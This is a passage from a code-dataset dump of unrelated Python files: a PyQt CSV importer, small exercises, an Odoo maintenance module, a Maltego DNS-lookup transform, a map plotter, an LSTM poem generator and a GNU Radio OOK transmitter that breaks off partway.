csv.reader(file, delimiter = \";\");\r\n return [row for row in chart_account];\r\n \r\n def _import_from_file(self, file_ext = '.csv', target_table = '', prompt = ''):\r\n '''\r\n Import a chart account in csv (or file_ext) file format.\r\n The file header and types have to comply with the database table.\r\n '''\r\n file, filepath = self._open_file(prompt);\r\n \r\n if (file is None or file == ''):\r\n return None;\r\n \r\n else:\r\n filename, ifile_ext = os.path.splitext(filepath);\r\n if (ifile_ext != file_ext):\r\n msg = \"Merci de choisir un format \" \\\r\n + file_ext \\\r\n + \" pour l'import de \" + prompt;\r\n msgBox = QMessageBox();\r\n msgBox.setIcon(QMessageBox.Warning);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n \r\n elif (file_ext == '.csv' and target_table != ''):\r\n chart_list = self._convert_csv_to_list(file);\r\n file.close();\r\n \r\n icon = None;\r\n \r\n self._db.table_update_from_list(target_table, chart_list);\r\n \r\n if (self._db.error):\r\n msg = \"L'import a provoqué une erreur.\\n\";\r\n msg += \"Vérifiez votre fichier et recommencez l'opération.\";\r\n icon = QMessageBox.Warning;\r\n \r\n else:\r\n msg = \"L'import s'est déroulé 
correctement.\\n\";\r\n msg += str(self._db.rows_inserted) + \" insérées.\" \r\n icon = QMessageBox.Information;\r\n \r\n msgBox = QMessageBox();\r\n msgBox.setIcon(icon);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n \r\n elif (file_ext == '.csv'):\r\n chart_list = self._convert_csv_to_list(file);\r\n file.close;\r\n return chart_list;\r\n \r\n def _import_splitted_file(self, file_ext = '.csv', targets_tables = [], open_prompt = ''):\r\n '''\r\n Import a file and imports it into differents tables into the DB.\r\n ''' \r\n \r\n grid = self._import_from_file(prompt = open_prompt);\r\n \r\n if (grid is not None):\r\n \r\n for table_name in targets_tables: \r\n heads = self._tables_head[table_name];\r\n table_insert = [];\r\n \r\n for row in range(0, len(grid)):\r\n \r\n row_insert = [];\r\n for col in range(0, len(grid[row])):\r\n if (grid[0][col] in heads):\r\n row_insert.append(grid[row][col].strip());\r\n \r\n if (len(row_insert) == len(heads)):\r\n table_insert.append(row_insert);\r\n \r\n #table_insert.sort();\r\n #table_insert = list(r for r,_ in itertools.groupby(table_insert)); \r\n #table_insert.insert(0, heads);\r\n #print(table_insert);\r\n self._db.table_update_from_list(table_name, table_insert);\r\n \r\n if (self._db.error):\r\n msg = \"L'import a provoqué une erreur.\\n\";\r\n msg += \"Vérifiez votre fichier et recommencez l'opération.\";\r\n msgBox = QMessageBox();\r\n msgBox.setIcon(QMessageBox.Warning);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n return;\r\n \r\n msg = \"Limport s'est déroulé correctement.\\n\";\r\n msg += str(self._db.rows_inserted) + \" lignes insérées.\" \r\n msgBox = QMessageBox();\r\n msgBox.setIcon(QMessageBox.Information);\r\n msgBox.setText(msg);\r\n msgBox.exec();\r\n \r\n ","sub_path":"view/iris_central.py","file_name":"iris_central.py","file_ext":"py","file_size_in_byte":39967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"341720459","text":"#conversor de petragem e calculador de consumo de gazolina\nmetros = float(input(\"Me informe a distancia em metros da sua casa ate o seu serviço \"))\ndecimetros = metros*10\ncentimetros = metros*100\nmilimetros = metros*1000\ndecametros = metros/10\nhectometro = metros/100\nkilometros = metros/1000\ngazolina = (kilometros/8)*4.50\nprint(\" Você percorre {} metro, {} decimetros, {} centimetros, {} milimetros\".format(metros, decimetros, centimetros, milimetros)) \nprint(\" Ou {} decametros, {} hectometro, {}kilometro e consome por viagem {} de gazolina\".format(decametros, hectometro, kilometros, gazolina))\n","sub_path":"extra/exe008.py","file_name":"exe008.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"108180399","text":"#!/usr/bin/env python3\n# vim: sta:et:sw=2:ts=2:sts=2\n\"\"\"\nConfig options\n\"\"\"\n\nfrom boot import *\n\nTHE= o( \n char = o( sep = \",\",\n num = \"$\",\n less = \"<\",\n more = \">\",\n skip = \"?\",\n klass= \"!\",\n doomed = r'([\\n\\t\\r ]|#.*)'),\n div = o( trivial = 1.025, \n cohen = 0.3, \n min = 0.5)\n)\n","sub_path":"hw/5/the.py","file_name":"the.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632622704","text":"#!/usr/bin/env python\n\nfrom canari.maltego.configuration import BuiltInTransformSets\nfrom canari.maltego.entities import DNSName\nfrom canari.framework import configure\n\nfrom common.dnstools import 
nslookup\n\n__author__ = 'Nadeem Douba'\n__copyright__ = 'Copyright 2012, Sploitego Project'\n__credits__ = []\n\n__license__ = 'GPL'\n__version__ = '0.1'\n__maintainer__ = 'Nadeem Douba'\n__email__ = 'ndouba@gmail.com'\n__status__ = 'Development'\n\n__all__ = [\n 'dotransform'\n]\n\n\n@configure(\n label='To IPv6 Address [DNS]',\n description='This transform attempts to resolve a DNS record to an IPv6 Address.',\n uuids=[\n 'sploitego.v2.DNSNameToIPv6Address_DNS'\n ],\n inputs=[\n ( BuiltInTransformSets.ResolveToIP, DNSName )\n ]\n)\ndef dotransform(request, response):\n nslookup(request.value, 'AAAA', response)\n return response","sub_path":"src/sploitego/transforms/dnsaaaalookup.py","file_name":"dnsaaaalookup.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548608025","text":"# -*- coding: utf-8 -*-\n#\n# {project.authors}\n# {project.affiliations}\n# (c) {project.span} all rights reserved\n#\n\n\n# externals\nimport os\n\n\n# platform hook\ndef platform(builder):\n \"\"\"\n Decorate the builder with platform specific options\n \"\"\"\n # get the platform id\n platform = builder.host.system\n # print('platform:', platform)\n\n # on darwin\n if platform == 'Darwin':\n # assume macports\n systemdir = '/opt/local'\n systemlibdir = os.path.join(systemdir, 'lib')\n systemincdir = os.path.join(systemdir, 'include')\n\n # set up python\n pythonVersion = '3.4'\n pythonMemoryModel = 'm'\n python = 'python' + pythonVersion\n pythonHome = os.path.join(\n systemdir, 'Library/Frameworks/Python.framework/Versions', pythonVersion)\n builder.requirements['python'].environ = {{\n 'PYTHON': python,\n 'PYTHON_PYCFLAGS': '-b',\n 'PYTHON_DIR': systemdir,\n 'PYTHON_LIBDIR': os.path.join(pythonHome, 'lib'),\n 'PYTHON_INCDIR': os.path.join(pythonHome, 'include', python+pythonMemoryModel),\n }}\n\n # all done\n return builder\n\n # on linux\n if platform == 'Linux':\n # on normal distributions\n systemdir = '/usr'\n systemlibdir = os.path.join(systemdir, 'lib')\n systemincdir = os.path.join(systemdir, 'include')\n\n # set up python\n pythonVersion = '3.4'\n python = 'python' + pythonVersion\n builder.requirements['python'].environ = {{\n 'PYTHON': python,\n 'PYTHON_PYCFLAGS': '-b',\n 'PYTHON_DIR': systemdir,\n 'PYTHON_LIBDIR': os.path.join(systemdir, 'lib', python),\n 'PYTHON_INCDIR': os.path.join(systemdir, 'include', python),\n }}\n\n # all done\n return builder\n\n # on all other platforms\n return builder\n\n\n# end of file\n","sub_path":"templates/django/.mm/platforms.py","file_name":"platforms.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"612039467","text":"'''\nСоздать текстовый файл (не программно). Построчно записать фамилии сотрудников и величину их окладов\n(не менее 10 строк). Определить, кто из сотрудников имеет оклад менее 20 тысяч,\nвывести фамилии этих сотрудников. 
Выполнить подсчёт средней величины дохода сотрудников.\n'''\nsum_pay = 0\ntry:\n with open(\"workers.txt\") as f_obj:\n for i, line in enumerate(f_obj,1):\n sum_pay += float(line.split()[1])\n if float(line.split()[1]) < 20000:\n print(f\"{line.split()[0]} имеет оклад менее 20 тысяч, он получает = {line.split()[1]} руб.\")\n print(\"-\" * 30)\n print(f\"Средний доход сотрудников = {round(sum_pay/i, 2)} руб.\")\nexcept IOError:\n print(\"Произошла ошибка ввода-вывода!\")","sub_path":"53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"642419028","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nfrom datetime import datetime, timedelta\nfrom odoo.tools.misc import formatLang, format_date, get_lang\n\nclass BimMaintenance(models.Model):\n _name = \"bim.maintenance\"\n _inherit = ['mail.thread', 'mail.activity.mixin', 'image.mixin']\n _description = \"Ordenes Mantenimiento BIM\"\n _order = 'id desc'\n\n @api.depends('line_ids.price_subtotal')\n def _compute_total(self):\n for record in self:\n record.amount_total = sum(x.price_subtotal for x in record.line_ids)\n\n @api.depends('requisition_ids')\n def _compute_req_count(self):\n for project in self:\n project.req_count = len(project.requisition_ids)\n\n def _compute_invoice(self):\n for record in self:\n record.invoice_count = len(record.invoice_ids)\n\n name = fields.Char(string='Referencia', required=True, copy=False,\n readonly=True, states={'draft': [('readonly', False)]},\n index=True, default=lambda self: 'Nuevo')\n state = fields.Selection([\n ('draft', 'Nuevo'),\n ('planned', 'Programado'),\n ('done', 'Ejecutado'),\n ('invoiced', 'Facturado'),\n ('cancel', 'Cancelado'),\n ], string='Estado', readonly=True, copy=False, index=True,\n track_visibility='onchange', default='draft')\n date_planned = fields.Datetime(string='Fecha Estimada', required=True,\n readonly=True, index=True, states={'draft': [('readonly', False)]},\n copy=False, default=fields.Datetime.now)\n date_done = fields.Datetime(string='Fecha Ejecución',\n readonly=True, index=True, states={'draft': [('readonly', False)]},\n copy=False, default=fields.Datetime.now)\n partner_id = fields.Many2one('res.partner', string='Cliente', readonly=True,\n states={'draft': [('readonly', False)]}, required=True, change_default=True,\n index=True, track_visibility='always')\n project_id = fields.Many2one('bim.project', 'Obra', readonly=True,\n required=True, copy=False, states={'draft': [('readonly', False)]})\n invoice_ids = fields.One2many('account.move', 'maintenance_id', 'Facturas')\n invoice_count = fields.Integer('Facturas', compute=_compute_invoice)\n invoice_id = fields.Many2one('account.move', string='Factura', readonly=True)\n note = fields.Text('Observaciones')\n user_id = fields.Many2one('res.users', string='Responsable',\n states={'draft': [('readonly', False)]}, index=True,\n track_visibility='onchange', default=lambda self: self.env.user)\n company_id = fields.Many2one('res.company', 'Compañía', default=lambda self: self.env.company)\n currency_id = fields.Many2one(\"res.currency\", related='company_id.currency_id',\n string=\"Moneda\", readonly=True, required=True)\n line_ids = fields.One2many('bim.maintenance.line', 'maintenance_id',\n string='Líneas', states={'cancel': [('readonly', True)], 'done': [('readonly', True)]}, copy=True)\n amount_total = fields.Monetary('Total', 
compute=\"_compute_total\", store=True)\n requisition_ids = fields.One2many('bim.purchase.requisition','maintenance_id','Sol. de Materiales')\n req_count = fields.Integer('Cantidad Sol Materiales', compute=\"_compute_req_count\")\n maintenance_duration = fields.Integer('Duración Estimada (días)', default=1)\n department_id = fields.Many2one('bim.department', 'Departamento', related=\"project_id.department_id\", store=True)\n invoice_amount = fields.Monetary('Monto a Facturar')\n maintenance_currency_id = fields.Many2one('res.currency', 'Moneda', related=\"project_id.maintenance_currency_id\",\n store=True)\n reminder = fields.Boolean('recordatorio', compute='compute_reminder')\n days_reminder = fields.Integer('dias recordatorio', compute='compute_days_reminder')\n\n def compute_days_reminder(self):\n for record in self:\n today = fields.Datetime.now()\n rest = 0\n if format_date(record.env, today) <= format_date(record.env, record.date_planned):\n rest = record.date_planned - today\n if record.name == \"Nuevo\":\n record.days_reminder = rest.days + 1\n else:\n record.days_reminder = 0\n\n def compute_reminder(self):\n for record in self:\n today = fields.Datetime.now()\n reminder = False\n for day in record.company_id.array_day_ids:\n date_reminder = today + timedelta(days=day.name)\n date_reminder = format_date(self.env, date_reminder)\n date_planned = format_date(self.env, record.date_planned)\n if date_reminder == date_planned:\n reminder = True\n break\n if reminder:\n record.reminder = reminder\n else:\n record.reminder = False\n\n def action_send(self):\n maintenances = self.env['bim.maintenance'].search([])\n for mant in maintenances:\n if mant.reminder:\n template = mant.company_id.template_mant_id\n mail = template.send_mail(mant.id, force_send=True)\n if mail:\n mant.message_post(\n body=_(\"Enviado email a Soporte: %s\" % mant.project_id.customer_id.name))\n\n @api.model\n def create(self, vals):\n if vals.get('name', 'Nuevo') == 'Nuevo':\n vals['name'] = self.env['ir.sequence'].next_by_code('bim.maintenance') or 'Nuevo'\n maintenance = super(BimMaintenance, self).create(vals)\n return maintenance\n\n @api.onchange('project_id')\n def onchange_project_id(self):\n if self.project_id:\n self.partner_id = self.project_id.customer_id.id\n\n def action_programmed(self):\n self.write({'state': 'planned'})\n\n def action_executed(self):\n self.write({'state': 'done'})\n\n def action_cancel(self):\n self.write({'state': 'cancel'})\n\n def action_view_req(self):\n reqs = self.mapped('requisition_ids')\n action = self.env.ref('base_bim_2.action_bim_purchase_requisition').read()[0]\n action['domain'] = [('id', 'in', reqs.ids)]\n return action\n\n def generate_bim_req(self):\n self.ensure_one()\n req_lines = []\n for line in self.line_ids:\n if line.product_id.type != 'service' and line.product_id.resource_type in ['HR','M','Q'] and line.quantity > 0.0:\n req_lines.append((0,0,{\n 'product_id': line.product_id.id,\n 'um_id': line.uom_id.id,\n 'quant': line.quantity\n }))\n if len(req_lines) == 0:\n raise UserError(u'No hay productos por realizar solicitud')\n requisition = self.env['bim.purchase.requisition'].create({\n 'user_id': self.user_id.id,\n 'project_id': self.project_id.id,\n 'date_begin': datetime.now(),\n 'product_ids': req_lines,\n 'maintenance_id': self.id\n })\n action = self.env.ref('base_bim_2.action_bim_purchase_requisition')\n result = action.read()[0]\n res = self.env.ref('base_bim_2.view_form_bim_purchase_requisition', False)\n result['views'] = [(res and res.id or 
False, 'form')]\r\n result['res_id'] = requisition.id\r\n return result\r\n\r\n def generate_paidstate(self):\r\n self.ensure_one()\r\n epaid = self.env['bim.paidstate'].create({\r\n 'project_id': self.project_id.id,\r\n 'amount': self.invoice_amount,\r\n 'currency_id': self.maintenance_currency_id.id,\r\n 'maintenance_id': self.id\r\n })\r\n self.state = 'invoiced'\r\n action = self.env.ref('base_bim_2.action_bim_paidstate')\r\n result = action.read()[0]\r\n res = self.env.ref('base_bim_2.view_form_bim_paidstate', False)\r\n result['views'] = [(res and res.id or False, 'form')]\r\n result['res_id'] = epaid.id\r\n return result\r\n\r\n def action_view_invoices(self):\r\n invoices = []\r\n for inv in self.invoice_ids:\r\n if inv.type == 'out_invoice':\r\n invoices.append(inv.id)\r\n action = self.env.ref('account.action_move_out_invoice_type').read()[0]\r\n if len(invoices) > 0:\r\n action['domain'] = [('id', 'in', invoices)]\r\n else:\r\n action = {'type': 'ir.actions.act_window_close'}\r\n return action\r\n\r\nclass BimMaintenanceLine(models.Model):\r\n _name = 'bim.maintenance.line'\r\n _description = 'Lineas de mantenimiento'\r\n\r\n @api.depends('quantity','price_unit')\r\n def _compute_subtotal(self):\r\n for record in self:\r\n record.price_subtotal = record.quantity * record.price_unit\r\n\r\n name = fields.Char('Descripción')\r\n product_id = fields.Many2one('product.product', string='Producto')\r\n uom_id = fields.Many2one('uom.uom', 'UdM', related=\"product_id.uom_id\", readonly=True)\r\n quantity = fields.Float(\"Cantidad\")\r\n price_unit = fields.Float(\"Precio\")\r\n price_subtotal = fields.Float(\"Importe\", compute='_compute_subtotal')\r\n maintenance_id = fields.Many2one('bim.maintenance', string=\"Mantenimiento\", ondelete='cascade')\r\n\r\n @api.onchange('product_id')\r\n def onchange_product(self):\r\n if self.product_id:\r\n self.name = self.product_id.name\r\n\r\nclass BimMaintenanceTagsDays(models.Model):\r\n _name = \"bim.maintenance.tags.days\"\r\n _description = \"Dias restantes mantenimiento\"\r\n\r\n name = fields.Integer('Días')","sub_path":"base_bim_2/models/bim_maintenance.py","file_name":"bim_maintenance.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"236936163","text":"import networkx as nx\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom lib.logger import log\n\nmatplotlib.use('TkAgg') # this is required for mac when matplotlib is used in\n # conjunction with tensorflow, otherwise a cryptic error\n # is thrown\n\ndef plot(nodes, ways, tags=None, ways_labels=None):\n\n G = nx.Graph()\n pos = {}\n\n for w_id, way in ways.items():\n parse_way = False\n if tags == None:\n parse_way = True\n else:\n for k, v in tags:\n if k in way.tags and (way.tags[k] == v or v == None):\n parse_way = True\n break\n\n if parse_way == False:\n continue\n\n log(\"Way accepted into plot with tags: {}\".format(way.tags), \"DEBUG\")\n for i in range(len(way.nodes)-1):\n n1, n2 = way.nodes[i], way.nodes[i+1]\n if n1 not in pos:\n G.add_node(n1, node_color=nodes[n1].color, label=str(n1))\n pos[n1] = nodes[n1].location\n if n2 not in pos:\n G.add_node(n2, node_color=nodes[n2].color, label=str(n2))\n pos[n2] = nodes[n2].location\n G.add_edge(n1, n2, width=1, edge_color=way.color)\n\n labels = nx.get_node_attributes(G,'label')\n options = { \"node_size\": 20, \"linewidths\": 0}#,\"labels\":labels}\n edges = G.edges()\n node_color = nx.get_node_attributes(G,'node_color').values()\n edge_width = [G[u][v]['width'] for u,v in edges]\n edge_color = 
[G[u][v]['edge_color'] for u,v in edges]\n\n nx.draw(G, pos, node_color=node_color, #edge_color=edge_color,\n width=edge_width, **options)\n\n if ways_labels != None:\n h2 = nx.draw_networkx_edges(G, pos=pos, edge_color=edge_color)\n\n def make_proxy(clr, mappable, **kwargs):\n return Line2D([0, 1], [0, 1], color=clr, **kwargs)\n\n # generate proxies with the above function\n proxies = [make_proxy(clr, h2, lw=5) for clr in list(ways_labels.values())]\n edge_labels = [\"{}\".format(tag) for tag, color in ways_labels.items()]\n plt.legend(proxies, edge_labels)\n\n plt.show()\n\ndef plot_cycles_w_density(nodes, cycles, buildings,tags=None,ways_labels=None):\n G = nx.Graph()\n pos = {}\n\n for c_id, cycle in cycles.items():\n c = cycle[\"n_ids\"]\n density_color = \"black\" if cycles[c_id][\"density\"] == 0 else \"blue\"\n for i in range(len(c)):\n n1 = c[i]\n n2 = c[(i+1)%len(c)]\n if n1 not in pos:\n G.add_node(n1, node_color=density_color, node_size=1.0)\n pos[n1] = nodes[n1].location\n if n2 not in pos:\n G.add_node(n2, node_color=density_color, node_size=1.0)\n pos[n2] = nodes[n2].location\n G.add_edge(n1, n2, width=1, edge_color=density_color)\n\n for w_id, way in buildings.items():\n for i in range(len(way.nodes)):\n n1 = way.nodes[i]\n n2 = way.nodes[(i+1)%len(way.nodes)]\n if n1 not in pos:\n G.add_node(n1, node_color=\"black\", node_size=0.1)\n pos[n1] = nodes[n1].location\n if n2 not in pos:\n G.add_node(n2, node_color=\"black\", node_size=0.1)\n pos[n2] = nodes[n2].location\n if G.has_edge(n1, n2) == False:\n G.add_edge(n1, n2, width=1, edge_color=\"black\")\n\n options = {\n \"linewidths\": 1,\n \"node_color\": nx.get_node_attributes(G,'node_color').values(),\n \"node_size\": list(nx.get_node_attributes(G,'node_size').values()),\n \"width\": [G[u][v]['width'] for u,v in G.edges()],\n \"edge_color\": [G[u][v]['edge_color'] for u,v in G.edges()]\n }\n nx.draw(G, pos, **options)\n\n plt.show()\n","sub_path":"generator/lib/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"75952598","text":"#importing dependencies\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, LSTM, RNN, GRU\nfrom keras.utils import np_utils\nimport os\n\n#load the data\nws_dir = './'\nweight_dir = 'saved_weight.h5'\ntext = open(ws_dir+'chairilanwar_poem.txt').read()\ntext = text.lower()\n\n#create character/word mappings\ncharachters = sorted(list(set(text)))\nn_to_char = {n:char for n, char in enumerate(charachters)}\nchar_to_n = {char:n for n, char in enumerate(charachters)}\n\n#data preprocessing\nX = []\nY = []\nX_modified = 0.0\nY_modified = 0.0\nmodel = None\nepoch = 10\nbatch = 200\nlength = len(text)\nseq_length = 120\n\ndef initialization() :\n global length, seq_length, text,char_to_n, n_to_char, X_modified, Y_modified, X, Y, charachters\n for i in range(0,length-seq_length,1):\n sequence = text[i : i+seq_length]\n label = text[i+seq_length]\n X.append([char_to_n[char] for char in sequence])\n Y.append(char_to_n[label])\n\n X_modified = np.reshape(X,(len(X),seq_length,1))\n X_modified = X_modified / float(len(charachters))\n Y_modified = np_utils.to_categorical(Y)\n\n#model\ndef runPoem() :\n global model, X_modified, Y_modified, epoch, batch, ws_dir, weight_dir\n model = Sequential()\n model.add(LSTM(200, input_shape=(X_modified.shape[1], X_modified.shape[2]), return_sequences=True))\n 
model.add(Dropout(0.25))\n model.add(LSTM(100,return_sequences=True))\n model.add(Dropout(0.2))\n model.add(GRU(200))\n model.add(Dropout(0.25))\n model.add(Dense(Y_modified.shape[1],activation='softmax'))\n if os.path.exists(ws_dir+weight_dir) :\n model.load_weights(ws_dir+weight_dir)\n model.compile(loss='categorical_crossentropy',optimizer='adam')\n model.fit(X_modified, Y_modified, epochs=epoch, batch_size=batch)\n model.save_weights(ws_dir+weight_dir)\n\ndef savePoem() :\n global model,X,Y, charachters, char_to_n, n_to_char, seq_length\n#generating text\n string_mapped = X[seq_length-1]\n full_string = [n_to_char[value] for value in string_mapped]\n#generating characters\n for i in range(seq_length) :\n x = np.reshape(string_mapped,(1,len(string_mapped),1))\n x = x / float(len(charachters))\n pred_index = np.argmax(model.predict(x,verbose=0))\n full_string.append(n_to_char[pred_index])\n string_mapped.append(pred_index)\n string_mapped = string_mapped[1:len(string_mapped)]\n\n#combining text\n txt = ''\n for char in full_string :\n txt = txt + char\n file = open('mypoem.txt','w')\n file.write(txt)\n file.close() \n\nif __name__ == '__main__' :\n initialization()\n runPoem()\n savePoem()\n","sub_path":"lstm-gru-poem.py","file_name":"lstm-gru-poem.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"567502198","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#\n# SPDX-License-Identifier: GPL-3.0\n#\n# GNU Radio Python Flow Graph\n# Title: ook_tx\n# Author: student\n# GNU Radio version: 3.9.2.0\n\nfrom distutils.version import StrictVersion\n\nif __name__ == '__main__':\n import ctypes\n import sys\n if sys.platform.startswith('linux'):\n try:\n x11 = ctypes.cdll.LoadLibrary('libX11.so')\n x11.XInitThreads()\n except:\n print(\"Warning: failed to XInitThreads()\")\n\nfrom PyQt5 import Qt\nfrom gnuradio import qtgui\nfrom gnuradio.filter import firdes\nimport sip\nfrom gnuradio import analog\nfrom gnuradio import blocks\nfrom gnuradio import filter\nfrom gnuradio import gr\nfrom gnuradio.fft import window\nimport sys\nimport signal\nfrom argparse import ArgumentParser\nfrom gnuradio.eng_arg import eng_float, intx\nfrom gnuradio import eng_notation\nimport limesdr\nimport ook_tx_epy_block_0 as epy_block_0 # embedded python block\n\n\n\nfrom gnuradio import qtgui\n\nclass ook_tx(gr.top_block, Qt.QWidget):\n\n def __init__(self):\n gr.top_block.__init__(self, \"ook_tx\", catch_exceptions=True)\n Qt.QWidget.__init__(self)\n self.setWindowTitle(\"ook_tx\")\n qtgui.util.check_set_qss()\n try:\n self.setWindowIcon(Qt.QIcon.fromTheme('gnuradio-grc'))\n except:\n pass\n self.top_scroll_layout = Qt.QVBoxLayout()\n self.setLayout(self.top_scroll_layout)\n self.top_scroll = Qt.QScrollArea()\n self.top_scroll.setFrameStyle(Qt.QFrame.NoFrame)\n self.top_scroll_layout.addWidget(self.top_scroll)\n self.top_scroll.setWidgetResizable(True)\n self.top_widget = Qt.QWidget()\n self.top_scroll.setWidget(self.top_widget)\n self.top_layout = Qt.QVBoxLayout(self.top_widget)\n self.top_grid_layout = Qt.QGridLayout()\n self.top_layout.addLayout(self.top_grid_layout)\n\n self.settings = Qt.QSettings(\"GNU Radio\", \"ook_tx\")\n\n try:\n if StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n self.restoreGeometry(self.settings.value(\"geometry\").toByteArray())\n else:\n self.restoreGeometry(self.settings.value(\"geometry\"))\n except:\n pass\n\n ##################################################\n # 
Variables\n ##################################################\n self.sps = sps = 25\n self.baud = baud = 1200\n self.upsamp = upsamp = 50\n self.samp_rate = samp_rate = sps*baud\n self.payload = payload = 'I am over the air! '\n\n ##################################################\n # Blocks\n ##################################################\n self.root_raised_cosine_filter_0 = filter.fir_filter_fff(\n 1,\n firdes.root_raised_cosine(\n 1,\n samp_rate,\n baud,\n 0.35,\n 11*sps))\n self.rational_resampler_xxx_0 = filter.rational_resampler_ccc(\n interpolation=upsamp,\n decimation=1,\n taps=[],\n fractional_bw=0)\n self.qtgui_time_sink_x_0 = qtgui.time_sink_f(\n 1024, #size\n samp_rate, #samp_rate\n 'Shaped Symbol Train', #name\n 1, #number of inputs\n None # parent\n )\n self.qtgui_time_sink_x_0.set_update_time(0.10)\n self.qtgui_time_sink_x_0.set_y_axis(-1, 1)\n\n self.qtgui_time_sink_x_0.set_y_label('Amplitude', \"\")\n\n self.qtgui_time_sink_x_0.enable_tags(True)\n self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, qtgui.TRIG_SLOPE_POS, 0.0, 0, 0, \"\")\n self.qtgui_time_sink_x_0.enable_autoscale(False)\n self.qtgui_time_sink_x_0.enable_grid(True)\n self.qtgui_time_sink_x_0.enable_axis_labels(True)\n self.qtgui_time_sink_x_0.enable_control_panel(False)\n self.qtgui_time_sink_x_0.enable_stem_plot(False)\n\n self.qtgui_time_sink_x_0.disable_legend()\n\n labels = ['Signal 1', 'Signal 2', 'Signal 3', 'Signal 4', 'Signal 5',\n 'Signal 6', 'Signal 7', 'Signal 8', 'Signal 9', 'Signal 10']\n widths = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n colors = ['blue', 'red', 'green', 'black', 'cyan',\n 'magenta', 'yellow', 'dark red', 'dark green', 'dark blue']\n alphas = [1.0, 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0]\n styles = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n markers = [-1, -1, -1, -1, -1,\n -1, -1, -1, -1, -1]\n\n\n for i in range(1):\n if len(labels[i]) == 0:\n self.qtgui_time_sink_x_0.set_line_label(i, \"Data {0}\".format(i))\n else:\n self.qtgui_time_sink_x_0.set_line_label(i, labels[i])\n self.qtgui_time_sink_x_0.set_line_width(i, widths[i])\n self.qtgui_time_sink_x_0.set_line_color(i, colors[i])\n self.qtgui_time_sink_x_0.set_line_style(i, styles[i])\n self.qtgui_time_sink_x_0.set_line_marker(i, markers[i])\n self.qtgui_time_sink_x_0.set_line_alpha(i, alphas[i])\n\n self._qtgui_time_sink_x_0_win = sip.wrapinstance(self.qtgui_time_sink_x_0.pyqwidget(), Qt.QWidget)\n self.top_layout.addWidget(self._qtgui_time_sink_x_0_win)\n self.qtgui_freq_sink_x_0 = qtgui.freq_sink_f(\n 1024, #size\n window.WIN_BLACKMAN_hARRIS, #wintype\n 0, #fc\n samp_rate, #bw\n 'TX Spectrum', #name\n 1,\n None # parent\n )\n self.qtgui_freq_sink_x_0.set_update_time(0.10)\n self.qtgui_freq_sink_x_0.set_y_axis(-140, 10)\n self.qtgui_freq_sink_x_0.set_y_label('Relative Gain', 'dB')\n self.qtgui_freq_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_FREE, 0.0, 0, \"\")\n self.qtgui_freq_sink_x_0.enable_autoscale(False)\n self.qtgui_freq_sink_x_0.enable_grid(True)\n self.qtgui_freq_sink_x_0.set_fft_average(1.0)\n self.qtgui_freq_sink_x_0.enable_axis_labels(True)\n self.qtgui_freq_sink_x_0.enable_control_panel(False)\n self.qtgui_freq_sink_x_0.set_fft_window_normalized(False)\n\n self.qtgui_freq_sink_x_0.disable_legend()\n\n self.qtgui_freq_sink_x_0.set_plot_pos_half(not True)\n\n labels = ['', '', '', '', '',\n '', '', '', '', '']\n widths = [1, 1, 1, 1, 1,\n 1, 1, 1, 1, 1]\n colors = [\"blue\", \"red\", \"green\", \"black\", \"cyan\",\n \"magenta\", \"yellow\", \"dark red\", \"dark green\", \"dark blue\"]\n alphas = [1.0, 
1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0, 1.0]\n\n for i in range(1):\n if len(labels[i]) == 0:\n self.qtgui_freq_sink_x_0.set_line_label(i, \"Data {0}\".format(i))\n else:\n self.qtgui_freq_sink_x_0.set_line_label(i, labels[i])\n self.qtgui_freq_sink_x_0.set_line_width(i, widths[i])\n self.qtgui_freq_sink_x_0.set_line_color(i, colors[i])\n self.qtgui_freq_sink_x_0.set_line_alpha(i, alphas[i])\n\n self._qtgui_freq_sink_x_0_win = sip.wrapinstance(self.qtgui_freq_sink_x_0.pyqwidget(), Qt.QWidget)\n self.top_layout.addWidget(self._qtgui_freq_sink_x_0_win)\n self.limesdr_sink_0 = limesdr.sink('', 0, '', '')\n\n\n self.limesdr_sink_0.set_sample_rate(samp_rate*upsamp)\n\n\n self.limesdr_sink_0.set_center_freq(100e6, 0)\n\n self.limesdr_sink_0.set_bandwidth(5e6, 0)\n\n\n self.limesdr_sink_0.set_digital_filter(samp_rate*upsamp, 0)\n\n\n self.limesdr_sink_0.set_gain(40, 0)\n\n\n self.limesdr_sink_0.set_antenna(255, 0)\n\n\n self.limesdr_sink_0.calibrate(2.5e6, 0)\n self.epy_block_0 = 